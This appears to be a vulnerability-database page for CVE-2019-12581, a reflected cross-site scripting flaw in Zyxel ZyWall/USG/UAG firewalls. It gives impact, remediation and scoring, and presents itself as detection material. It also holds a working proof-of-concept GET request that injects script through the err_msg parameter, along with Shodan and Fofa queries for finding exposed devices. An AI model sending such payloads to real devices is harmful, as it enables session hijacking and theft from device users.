🔙 목록으로 돌아가기

CVE-2019-12581: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting

TitleZyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
Authorn-thumann
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest firmware update provided by Zyxel to fix the XSS vulnerability.
CVSS Score6.1
EPSS Score0.55651
CVE IDCVE-2019-12581
CWE IDCWE-79
Shodan Queryhttp.title:"ZyWall"
Fofa Querytitle="zywall"
Tags cve cve2019 zyxel zywall xss vuln

🔍 Vulnerability Description

Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.

🌐 HTTP Request

GET /free_time_failed.cgi?err_msg=<script>alert(document.domain);</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12581.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-12581.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A